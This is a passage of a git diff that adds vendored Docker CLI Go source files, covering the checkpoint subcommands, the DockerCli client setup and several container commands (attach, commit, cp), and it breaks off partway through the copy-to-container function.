+			opts.checkpoint = args[1]
+			return runCreate(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVar(&opts.leaveRunning, "leave-running", false, "Leave the container running after checkpoint")
+	flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory")
+
+	return cmd
+}
+
+func runCreate(dockerCli *command.DockerCli, opts createOptions) error {
+	client := dockerCli.Client()
+
+	checkpointOpts := types.CheckpointCreateOptions{
+		CheckpointID:  opts.checkpoint,
+		CheckpointDir: opts.checkpointDir,
+		Exit:          !opts.leaveRunning,
+	}
+
+	err := client.CheckpointCreate(context.Background(), opts.container, checkpointOpts)
+	if err != nil {
+		return err
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "%s\n", opts.checkpoint)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go
new file mode 100644
index 0000000000..daf8349993
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go
@@ -0,0 +1,62 @@
+package checkpoint
+
+import (
+	"fmt"
+	"text/tabwriter"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type listOptions struct {
+	checkpointDir string
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts listOptions
+
+	cmd := &cobra.Command{
+		Use:     "ls [OPTIONS] CONTAINER",
+		Aliases: []string{"list"},
+		Short:   "List checkpoints for a container",
+		Args:    cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runList(dockerCli, args[0], opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory")
+
+	return cmd
+
+}
+
+func runList(dockerCli *command.DockerCli, container string, opts listOptions) error {
+	client := dockerCli.Client()
+
+	listOpts := types.CheckpointListOptions{
+		CheckpointDir: opts.checkpointDir,
+	}
+
+	checkpoints, err := client.CheckpointList(context.Background(), container, listOpts)
+	if err != nil {
+		return err
+	}
+
+	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
+	fmt.Fprintf(w, "CHECKPOINT NAME")
+	fmt.Fprintf(w, "\n")
+
+	for _, checkpoint := range checkpoints {
+		fmt.Fprintf(w, "%s\t", checkpoint.Name)
+		fmt.Fprint(w, "\n")
+	}
+
+	w.Flush()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go
new file mode 100644
index 0000000000..ec39fa7b55
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go
@@ -0,0 +1,44 @@
+package checkpoint
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type removeOptions struct {
+	checkpointDir string
+}
+
+func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts removeOptions
+
+	cmd := &cobra.Command{
+		Use:     "rm [OPTIONS] CONTAINER CHECKPOINT",
+		Aliases: []string{"remove"},
+		Short:   "Remove a checkpoint",
+		Args:    cli.ExactArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runRemove(dockerCli, args[0], args[1], opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory")
+
+	return cmd
+}
+
+func runRemove(dockerCli *command.DockerCli, container string, checkpoint string, opts removeOptions) error {
+	client := dockerCli.Client()
+
+	removeOpts := types.CheckpointDeleteOptions{
+		CheckpointID:  checkpoint,
+		CheckpointDir: opts.checkpointDir,
+	}
+
+	return client.CheckpointDelete(context.Background(), container, removeOpts)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/cli.go b/vendor/github.com/docker/docker/cli/command/cli.go
new file mode 100644
index 0000000000..6d1dd7472e
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/cli.go
@@ -0,0 +1,260 @@
+package command
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"path/filepath"
+	"runtime"
+
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	cliflags "github.com/docker/docker/cli/flags"
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/cliconfig/configfile"
+	"github.com/docker/docker/cliconfig/credentials"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/dockerversion"
+	dopts "github.com/docker/docker/opts"
+	"github.com/docker/go-connections/sockets"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+// Streams is an interface which exposes the standard input and output streams
+type Streams interface {
+	In() *InStream
+	Out() *OutStream
+	Err() io.Writer
+}
+
+// DockerCli represents the docker command line client.
+// Instances of the client can be returned from NewDockerCli.
+type DockerCli struct {
+	configFile      *configfile.ConfigFile
+	in              *InStream
+	out             *OutStream
+	err             io.Writer
+	keyFile         string
+	client          client.APIClient
+	hasExperimental bool
+	defaultVersion  string
+}
+
+// HasExperimental returns true if experimental features are accessible.
+func (cli *DockerCli) HasExperimental() bool {
+	return cli.hasExperimental
+}
+
+// DefaultVersion returns api.defaultVersion of DOCKER_API_VERSION if specified.
+func (cli *DockerCli) DefaultVersion() string {
+	return cli.defaultVersion
+}
+
+// Client returns the APIClient
+func (cli *DockerCli) Client() client.APIClient {
+	return cli.client
+}
+
+// Out returns the writer used for stdout
+func (cli *DockerCli) Out() *OutStream {
+	return cli.out
+}
+
+// Err returns the writer used for stderr
+func (cli *DockerCli) Err() io.Writer {
+	return cli.err
+}
+
+// In returns the reader used for stdin
+func (cli *DockerCli) In() *InStream {
+	return cli.in
+}
+
+// ShowHelp shows the command help.
+func (cli *DockerCli) ShowHelp(cmd *cobra.Command, args []string) error {
+	cmd.SetOutput(cli.err)
+	cmd.HelpFunc()(cmd, args)
+	return nil
+}
+
+// ConfigFile returns the ConfigFile
+func (cli *DockerCli) ConfigFile() *configfile.ConfigFile {
+	return cli.configFile
+}
+
+// GetAllCredentials returns all of the credentials stored in all of the
+// configured credential stores.
+func (cli *DockerCli) GetAllCredentials() (map[string]types.AuthConfig, error) {
+	auths := make(map[string]types.AuthConfig)
+	for registry := range cli.configFile.CredentialHelpers {
+		helper := cli.CredentialsStore(registry)
+		newAuths, err := helper.GetAll()
+		if err != nil {
+			return nil, err
+		}
+		addAll(auths, newAuths)
+	}
+	defaultStore := cli.CredentialsStore("")
+	newAuths, err := defaultStore.GetAll()
+	if err != nil {
+		return nil, err
+	}
+	addAll(auths, newAuths)
+	return auths, nil
+}
+
+func addAll(to, from map[string]types.AuthConfig) {
+	for reg, ac := range from {
+		to[reg] = ac
+	}
+}
+
+// CredentialsStore returns a new credentials store based
+// on the settings provided in the configuration file. Empty string returns
+// the default credential store.
+func (cli *DockerCli) CredentialsStore(serverAddress string) credentials.Store {
+	if helper := getConfiguredCredentialStore(cli.configFile, serverAddress); helper != "" {
+		return credentials.NewNativeStore(cli.configFile, helper)
+	}
+	return credentials.NewFileStore(cli.configFile)
+}
+
+// getConfiguredCredentialStore returns the credential helper configured for the
+// given registry, the default credsStore, or the empty string if neither are
+// configured.
+func getConfiguredCredentialStore(c *configfile.ConfigFile, serverAddress string) string {
+	if c.CredentialHelpers != nil && serverAddress != "" {
+		if helper, exists := c.CredentialHelpers[serverAddress]; exists {
+			return helper
+		}
+	}
+	return c.CredentialsStore
+}
+
+// Initialize the dockerCli runs initialization that must happen after command
+// line flags are parsed.
+func (cli *DockerCli) Initialize(opts *cliflags.ClientOptions) error {
+	cli.configFile = LoadDefaultConfigFile(cli.err)
+
+	var err error
+	cli.client, err = NewAPIClientFromFlags(opts.Common, cli.configFile)
+	if err != nil {
+		return err
+	}
+
+	cli.defaultVersion = cli.client.ClientVersion()
+
+	if opts.Common.TrustKey == "" {
+		cli.keyFile = filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile)
+	} else {
+		cli.keyFile = opts.Common.TrustKey
+	}
+
+	if ping, err := cli.client.Ping(context.Background()); err == nil {
+		cli.hasExperimental = ping.Experimental
+
+		// since the new header was added in 1.25, assume server is 1.24 if header is not present.
+		if ping.APIVersion == "" {
+			ping.APIVersion = "1.24"
+		}
+
+		// if server version is lower than the current cli, downgrade
+		if versions.LessThan(ping.APIVersion, cli.client.ClientVersion()) {
+			cli.client.UpdateClientVersion(ping.APIVersion)
+		}
+	}
+	return nil
+}
+
+// NewDockerCli returns a DockerCli instance with IO output and error streams set by in, out and err.
+func NewDockerCli(in io.ReadCloser, out, err io.Writer) *DockerCli {
+	return &DockerCli{in: NewInStream(in), out: NewOutStream(out), err: err}
+}
+
+// LoadDefaultConfigFile attempts to load the default config file and returns
+// an initialized ConfigFile struct if none is found.
+func LoadDefaultConfigFile(err io.Writer) *configfile.ConfigFile {
+	configFile, e := cliconfig.Load(cliconfig.ConfigDir())
+	if e != nil {
+		fmt.Fprintf(err, "WARNING: Error loading config file:%v\n", e)
+	}
+	if !configFile.ContainsAuth() {
+		credentials.DetectDefaultStore(configFile)
+	}
+	return configFile
+}
+
+// NewAPIClientFromFlags creates a new APIClient from command line flags
+func NewAPIClientFromFlags(opts *cliflags.CommonOptions, configFile *configfile.ConfigFile) (client.APIClient, error) {
+	host, err := getServerHost(opts.Hosts, opts.TLSOptions)
+	if err != nil {
+		return &client.Client{}, err
+	}
+
+	customHeaders := configFile.HTTPHeaders
+	if customHeaders == nil {
+		customHeaders = map[string]string{}
+	}
+	customHeaders["User-Agent"] = UserAgent()
+
+	verStr := api.DefaultVersion
+	if tmpStr := os.Getenv("DOCKER_API_VERSION"); tmpStr != "" {
+		verStr = tmpStr
+	}
+
+	httpClient, err := newHTTPClient(host, opts.TLSOptions)
+	if err != nil {
+		return &client.Client{}, err
+	}
+
+	return client.NewClient(host, verStr, httpClient, customHeaders)
+}
+
+func getServerHost(hosts []string, tlsOptions *tlsconfig.Options) (host string, err error) {
+	switch len(hosts) {
+	case 0:
+		host = os.Getenv("DOCKER_HOST")
+	case 1:
+		host = hosts[0]
+	default:
+		return "", errors.New("Please specify only one -H")
+	}
+
+	host, err = dopts.ParseHost(tlsOptions != nil, host)
+	return
+}
+
+func newHTTPClient(host string, tlsOptions *tlsconfig.Options) (*http.Client, error) {
+	if tlsOptions == nil {
+		// let the api client configure the default transport.
+		return nil, nil
+	}
+
+	config, err := tlsconfig.Client(*tlsOptions)
+	if err != nil {
+		return nil, err
+	}
+	tr := &http.Transport{
+		TLSClientConfig: config,
+	}
+	proto, addr, _, err := client.ParseHost(host)
+	if err != nil {
+		return nil, err
+	}
+
+	sockets.ConfigureTransport(tr, proto, addr)
+
+	return &http.Client{
+		Transport: tr,
+	}, nil
+}
+
+// UserAgent returns the user agent string used for making API requests
+func UserAgent() string {
+	return "Docker-Client/" + dockerversion.Version + " (" + runtime.GOOS + ")"
+}
diff --git a/vendor/github.com/docker/docker/cli/command/commands/commands.go b/vendor/github.com/docker/docker/cli/command/commands/commands.go
new file mode 100644
index 0000000000..d64d5680cc
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/commands/commands.go
@@ -0,0 +1,91 @@
+package commands
+
+import (
+	"os"
+
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/checkpoint"
+	"github.com/docker/docker/cli/command/container"
+	"github.com/docker/docker/cli/command/image"
+	"github.com/docker/docker/cli/command/network"
+	"github.com/docker/docker/cli/command/node"
+	"github.com/docker/docker/cli/command/plugin"
+	"github.com/docker/docker/cli/command/registry"
+	"github.com/docker/docker/cli/command/secret"
+	"github.com/docker/docker/cli/command/service"
+	"github.com/docker/docker/cli/command/stack"
+	"github.com/docker/docker/cli/command/swarm"
+	"github.com/docker/docker/cli/command/system"
+	"github.com/docker/docker/cli/command/volume"
+	"github.com/spf13/cobra"
+)
+
+// AddCommands adds all the commands from cli/command to the root command
+func AddCommands(cmd *cobra.Command, dockerCli *command.DockerCli) {
+	cmd.AddCommand(
+		node.NewNodeCommand(dockerCli),
+		service.NewServiceCommand(dockerCli),
+		swarm.NewSwarmCommand(dockerCli),
+		secret.NewSecretCommand(dockerCli),
+		container.NewContainerCommand(dockerCli),
+		image.NewImageCommand(dockerCli),
+		system.NewSystemCommand(dockerCli),
+		container.NewRunCommand(dockerCli),
+		image.NewBuildCommand(dockerCli),
+		network.NewNetworkCommand(dockerCli),
+		hide(system.NewEventsCommand(dockerCli)),
+		registry.NewLoginCommand(dockerCli),
+		registry.NewLogoutCommand(dockerCli),
+		registry.NewSearchCommand(dockerCli),
+		system.NewVersionCommand(dockerCli),
+		volume.NewVolumeCommand(dockerCli),
+		hide(system.NewInfoCommand(dockerCli)),
+		hide(container.NewAttachCommand(dockerCli)),
+		hide(container.NewCommitCommand(dockerCli)),
+		hide(container.NewCopyCommand(dockerCli)),
+		hide(container.NewCreateCommand(dockerCli)),
+		hide(container.NewDiffCommand(dockerCli)),
+		hide(container.NewExecCommand(dockerCli)),
+		hide(container.NewExportCommand(dockerCli)),
+		hide(container.NewKillCommand(dockerCli)),
+		hide(container.NewLogsCommand(dockerCli)),
+		hide(container.NewPauseCommand(dockerCli)),
+		hide(container.NewPortCommand(dockerCli)),
+		hide(container.NewPsCommand(dockerCli)),
+		hide(container.NewRenameCommand(dockerCli)),
+		hide(container.NewRestartCommand(dockerCli)),
+		hide(container.NewRmCommand(dockerCli)),
+		hide(container.NewStartCommand(dockerCli)),
+		hide(container.NewStatsCommand(dockerCli)),
+		hide(container.NewStopCommand(dockerCli)),
+		hide(container.NewTopCommand(dockerCli)),
+		hide(container.NewUnpauseCommand(dockerCli)),
+		hide(container.NewUpdateCommand(dockerCli)),
+		hide(container.NewWaitCommand(dockerCli)),
+		hide(image.NewHistoryCommand(dockerCli)),
+		hide(image.NewImagesCommand(dockerCli)),
+		hide(image.NewImportCommand(dockerCli)),
+		hide(image.NewLoadCommand(dockerCli)),
+		hide(image.NewPullCommand(dockerCli)),
+		hide(image.NewPushCommand(dockerCli)),
+		hide(image.NewRemoveCommand(dockerCli)),
+		hide(image.NewSaveCommand(dockerCli)),
+		hide(image.NewTagCommand(dockerCli)),
+		hide(system.NewInspectCommand(dockerCli)),
+		stack.NewStackCommand(dockerCli),
+		stack.NewTopLevelDeployCommand(dockerCli),
+		checkpoint.NewCheckpointCommand(dockerCli),
+		plugin.NewPluginCommand(dockerCli),
+	)
+
+}
+
+func hide(cmd *cobra.Command) *cobra.Command {
+	if os.Getenv("DOCKER_HIDE_LEGACY_COMMANDS") == "" {
+		return cmd
+	}
+	cmdCopy := *cmd
+	cmdCopy.Hidden = true
+	cmdCopy.Aliases = []string{}
+	return &cmdCopy
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/attach.go b/vendor/github.com/docker/docker/cli/command/container/attach.go
new file mode 100644
index 0000000000..31bb109344
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/attach.go
@@ -0,0 +1,130 @@
+package container
+
+import (
+	"fmt"
+	"io"
+	"net/http/httputil"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/spf13/cobra"
+)
+
+type attachOptions struct {
+	noStdin    bool
+	proxy      bool
+	detachKeys string
+
+	container string
+}
+
+// NewAttachCommand creates a new cobra.Command for `docker attach`
+func NewAttachCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts attachOptions
+
+	cmd := &cobra.Command{
+		Use:   "attach [OPTIONS] CONTAINER",
+		Short: "Attach to a running container",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.container = args[0]
+			return runAttach(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVar(&opts.noStdin, "no-stdin", false, "Do not attach STDIN")
+	flags.BoolVar(&opts.proxy, "sig-proxy", true, "Proxy all received signals to the process")
+	flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container")
+	return cmd
+}
+
+func runAttach(dockerCli *command.DockerCli, opts *attachOptions) error {
+	ctx := context.Background()
+	client := dockerCli.Client()
+
+	c, err := client.ContainerInspect(ctx, opts.container)
+	if err != nil {
+		return err
+	}
+
+	if !c.State.Running {
+		return fmt.Errorf("You cannot attach to a stopped container, start it first")
+	}
+
+	if c.State.Paused {
+		return fmt.Errorf("You cannot attach to a paused container, unpause it first")
+	}
+
+	if err := dockerCli.In().CheckTty(!opts.noStdin, c.Config.Tty); err != nil {
+		return err
+	}
+
+	if opts.detachKeys != "" {
+		dockerCli.ConfigFile().DetachKeys = opts.detachKeys
+	}
+
+	options := types.ContainerAttachOptions{
+		Stream:     true,
+		Stdin:      !opts.noStdin && c.Config.OpenStdin,
+		Stdout:     true,
+		Stderr:     true,
+		DetachKeys: dockerCli.ConfigFile().DetachKeys,
+	}
+
+	var in io.ReadCloser
+	if options.Stdin {
+		in = dockerCli.In()
+	}
+
+	if opts.proxy && !c.Config.Tty {
+		sigc := ForwardAllSignals(ctx, dockerCli, opts.container)
+		defer signal.StopCatch(sigc)
+	}
+
+	resp, errAttach := client.ContainerAttach(ctx, opts.container, options)
+	if errAttach != nil && errAttach != httputil.ErrPersistEOF {
+		// ContainerAttach returns an ErrPersistEOF (connection closed)
+		// means server met an error and put it in Hijacked connection
+		// keep the error and read detailed error message from hijacked connection later
+		return errAttach
+	}
+	defer resp.Close()
+
+	if c.Config.Tty && dockerCli.Out().IsTerminal() {
+		height, width := dockerCli.Out().GetTtySize()
+		// To handle the case where a user repeatedly attaches/detaches without resizing their
+		// terminal, the only way to get the shell prompt to display for attaches 2+ is to artificially
+		// resize it, then go back to normal. Without this, every attach after the first will
+		// require the user to manually resize or hit enter.
+		resizeTtyTo(ctx, client, opts.container, height+1, width+1, false)
+
+		// After the above resizing occurs, the call to MonitorTtySize below will handle resetting back
+		// to the actual size.
+		if err := MonitorTtySize(ctx, dockerCli, opts.container, false); err != nil {
+			logrus.Debugf("Error monitoring TTY size: %s", err)
+		}
+	}
+	if err := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp); err != nil {
+		return err
+	}
+
+	if errAttach != nil {
+		return errAttach
+	}
+
+	_, status, err := getExitCode(ctx, dockerCli, opts.container)
+	if err != nil {
+		return err
+	}
+	if status != 0 {
+		return cli.StatusError{StatusCode: status}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/cmd.go b/vendor/github.com/docker/docker/cli/command/container/cmd.go
new file mode 100644
index 0000000000..3e9b4880ac
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/cmd.go
@@ -0,0 +1,46 @@
+package container
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+)
+
+// NewContainerCommand returns a cobra command for `container` subcommands
+func NewContainerCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "container",
+		Short: "Manage containers",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		NewAttachCommand(dockerCli),
+		NewCommitCommand(dockerCli),
+		NewCopyCommand(dockerCli),
+		NewCreateCommand(dockerCli),
+		NewDiffCommand(dockerCli),
+		NewExecCommand(dockerCli),
+		NewExportCommand(dockerCli),
+		NewKillCommand(dockerCli),
+		NewLogsCommand(dockerCli),
+		NewPauseCommand(dockerCli),
+		NewPortCommand(dockerCli),
+		NewRenameCommand(dockerCli),
+		NewRestartCommand(dockerCli),
+		NewRmCommand(dockerCli),
+		NewRunCommand(dockerCli),
+		NewStartCommand(dockerCli),
+		NewStatsCommand(dockerCli),
+		NewStopCommand(dockerCli),
+		NewTopCommand(dockerCli),
+		NewUnpauseCommand(dockerCli),
+		NewUpdateCommand(dockerCli),
+		NewWaitCommand(dockerCli),
+		newListCommand(dockerCli),
+		newInspectCommand(dockerCli),
+		NewPruneCommand(dockerCli),
+	)
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/commit.go b/vendor/github.com/docker/docker/cli/command/container/commit.go
new file mode 100644
index 0000000000..cf8d0102a6
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/commit.go
@@ -0,0 +1,76 @@
+package container
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	dockeropts "github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+)
+
+type commitOptions struct {
+	container string
+	reference string
+
+	pause   bool
+	comment string
+	author  string
+	changes dockeropts.ListOpts
+}
+
+// NewCommitCommand creates a new cobra.Command for `docker commit`
+func NewCommitCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts commitOptions
+
+	cmd := &cobra.Command{
+		Use:   "commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]",
+		Short: "Create a new image from a container's changes",
+		Args:  cli.RequiresRangeArgs(1, 2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.container = args[0]
+			if len(args) > 1 {
+				opts.reference = args[1]
+			}
+			return runCommit(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.SetInterspersed(false)
+
+	flags.BoolVarP(&opts.pause, "pause", "p", true, "Pause container during commit")
+	flags.StringVarP(&opts.comment, "message", "m", "", "Commit message")
+	flags.StringVarP(&opts.author, "author", "a", "", "Author (e.g., \"John Hannibal Smith <hannibal@a-team.com>\")")
+
+	opts.changes = dockeropts.NewListOpts(nil)
+	flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image")
+
+	return cmd
+}
+
+func runCommit(dockerCli *command.DockerCli, opts *commitOptions) error {
+	ctx := context.Background()
+
+	name := opts.container
+	reference := opts.reference
+
+	options := types.ContainerCommitOptions{
+		Reference: reference,
+		Comment:   opts.comment,
+		Author:    opts.author,
+		Changes:   opts.changes.GetAll(),
+		Pause:     opts.pause,
+	}
+
+	response, err := dockerCli.Client().ContainerCommit(ctx, name, options)
+	if err != nil {
+		return err
+	}
+
+	fmt.Fprintln(dockerCli.Out(), response.ID)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/cp.go b/vendor/github.com/docker/docker/cli/command/container/cp.go
new file mode 100644
index 0000000000..17ab2accf9
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/cp.go
@@ -0,0 +1,303 @@
+package container
+
+import (
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/system"
+	"github.com/spf13/cobra"
+)
+
+type copyOptions struct {
+	source      string
+	destination string
+	followLink  bool
+}
+
+type copyDirection int
+
+const (
+	fromContainer copyDirection = (1 << iota)
+	toContainer
+	acrossContainers = fromContainer | toContainer
+)
+
+type cpConfig struct {
+	followLink bool
+}
+
+// NewCopyCommand creates a new `docker cp` command
+func NewCopyCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts copyOptions
+
+	cmd := &cobra.Command{
+		Use: `cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|-
+	docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH`,
+		Short: "Copy files/folders between a container and the local filesystem",
+		Long: strings.Join([]string{
+			"Copy files/folders between a container and the local filesystem\n",
+			"\nUse '-' as the source to read a tar archive from stdin\n",
+			"and extract it to a directory destination in a container.\n",
+			"Use '-' as the destination to stream a tar archive of a\n",
+			"container source to stdout.",
+		}, ""),
+		Args: cli.ExactArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if args[0] == "" {
+				return fmt.Errorf("source can not be empty")
+			}
+			if args[1] == "" {
+				return fmt.Errorf("destination can not be empty")
+			}
+			opts.source = args[0]
+			opts.destination = args[1]
+			return runCopy(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVarP(&opts.followLink, "follow-link", "L", false, "Always follow symbol link in SRC_PATH")
+
+	return cmd
+}
+
+func runCopy(dockerCli *command.DockerCli, opts copyOptions) error {
+	srcContainer, srcPath := splitCpArg(opts.source)
+	dstContainer, dstPath := splitCpArg(opts.destination)
+
+	var direction copyDirection
+	if srcContainer != "" {
+		direction |= fromContainer
+	}
+	if dstContainer != "" {
+		direction |= toContainer
+	}
+
+	cpParam := &cpConfig{
+		followLink: opts.followLink,
+	}
+
+	ctx := context.Background()
+
+	switch direction {
+	case fromContainer:
+		return copyFromContainer(ctx, dockerCli, srcContainer, srcPath, dstPath, cpParam)
+	case toContainer:
+		return copyToContainer(ctx, dockerCli, srcPath, dstContainer, dstPath, cpParam)
+	case acrossContainers:
+		// Copying between containers isn't supported.
+		return fmt.Errorf("copying between containers is not supported")
+	default:
+		// User didn't specify any container.
+		return fmt.Errorf("must specify at least one container source")
+	}
+}
+
+func statContainerPath(ctx context.Context, dockerCli *command.DockerCli, containerName, path string) (types.ContainerPathStat, error) {
+	return dockerCli.Client().ContainerStatPath(ctx, containerName, path)
+}
+
+func resolveLocalPath(localPath string) (absPath string, err error) {
+	if absPath, err = filepath.Abs(localPath); err != nil {
+		return
+	}
+
+	return archive.PreserveTrailingDotOrSeparator(absPath, localPath), nil
+}
+
+func copyFromContainer(ctx context.Context, dockerCli *command.DockerCli, srcContainer, srcPath, dstPath string, cpParam *cpConfig) (err error) {
+	if dstPath != "-" {
+		// Get an absolute destination path.
+		dstPath, err = resolveLocalPath(dstPath)
+		if err != nil {
+			return err
+		}
+	}
+
+	// if client requests to follow symbol link, then must decide target file to be copied
+	var rebaseName string
+	if cpParam.followLink {
+		srcStat, err := statContainerPath(ctx, dockerCli, srcContainer, srcPath)
+
+		// If the destination is a symbolic link, we should follow it.
+		if err == nil && srcStat.Mode&os.ModeSymlink != 0 {
+			linkTarget := srcStat.LinkTarget
+			if !system.IsAbs(linkTarget) {
+				// Join with the parent directory.
+				srcParent, _ := archive.SplitPathDirEntry(srcPath)
+				linkTarget = filepath.Join(srcParent, linkTarget)
+			}
+
+			linkTarget, rebaseName = archive.GetRebaseName(srcPath, linkTarget)
+			srcPath = linkTarget
+		}
+
+	}
+
+	content, stat, err := dockerCli.Client().CopyFromContainer(ctx, srcContainer, srcPath)
+	if err != nil {
+		return err
+	}
+	defer content.Close()
+
+	if dstPath == "-" {
+		// Send the response to STDOUT.
+		_, err = io.Copy(os.Stdout, content)
+
+		return err
+	}
+
+	// Prepare source copy info.
+	srcInfo := archive.CopyInfo{
+		Path:       srcPath,
+		Exists:     true,
+		IsDir:      stat.Mode.IsDir(),
+		RebaseName: rebaseName,
+	}
+
+	preArchive := content
+	if len(srcInfo.RebaseName) != 0 {
+		_, srcBase := archive.SplitPathDirEntry(srcInfo.Path)
+		preArchive = archive.RebaseArchiveEntries(content, srcBase, srcInfo.RebaseName)
+	}
+	// See comments in the implementation of `archive.CopyTo` for exactly what
+	// goes into deciding how and whether the source archive needs to be
+	// altered for the correct copy behavior.
+	return archive.CopyTo(preArchive, srcInfo, dstPath)
+}
+
+func copyToContainer(ctx context.Context, dockerCli *command.DockerCli, srcPath, dstContainer, dstPath string, cpParam *cpConfig) (err error) {
+	if srcPath != "-" {
+		// Get an absolute source path.
+		srcPath, err = resolveLocalPath(srcPath)
+		if err != nil {
+			return err
+		}
+	}
+
+	// In order to get the copy behavior right, we need to know information
+	// about both the source and destination. The API is a simple tar
+	// archive/extract API but we can use the stat info header about the
+	// destination to be more informed about exactly what the destination is.
+
+	// Prepare destination copy info by stat-ing the container path.
+	dstInfo := archive.CopyInfo{Path: dstPath}
+	dstStat, err := statContainerPath(ctx, dockerCli, dstContainer, dstPath)
+
+	// If the destination is a symbolic link, we should evaluate it.
+	if err == nil && dstStat.Mode&os.ModeSymlink != 0 {
+		linkTarget := dstStat.LinkTarget
+		if !system.IsAbs(linkTarget) {
+			// Join with the parent directory.
+			dstParent, _ := archive.SplitPathDirEntry(dstPath)
+			linkTarget = filepath.Join(dstParent, linkTarget)
+		}
+
+		dstInfo.Path = linkTarget
+		dstStat, err = statContainerPath(ctx, dockerCli, dstContainer, linkTarget)
+	}
+
+	// Ignore any error and assume that the parent directory of the destination
+	// path exists, in which case the copy may still succeed. If there is any
+	// type of conflict (e.g., non-directory overwriting an existing directory
+	// or vice versa) the extraction will fail. If the destination simply did
+	// not exist, but the parent directory does, the extraction will still
+	// succeed.
+	if err == nil {
+		dstInfo.Exists, dstInfo.IsDir = true, dstStat.Mode.IsDir()
+	}
+
+	var (
+		content         io.Reader
+		resolvedDstPath string
+	)
+
+	if srcPath == "-" {
+		// Use STDIN.
+		content = os.Stdin
+		resolvedDstPath = dstInfo.Path
+		if !dstInfo.IsDir {
+			return fmt.Errorf("destination %q must be a directory", fmt.Sprintf("%s:%s", dstContainer, dstPath))
+		}
+	} else {
+		// Prepare source copy info.
+		srcInfo, err := archive.CopyInfoSourcePath(srcPath, cpParam.followLink)
+		if err != nil {
+			return err
+		}
+
+		srcArchive, err := archive.TarResource(srcInfo)
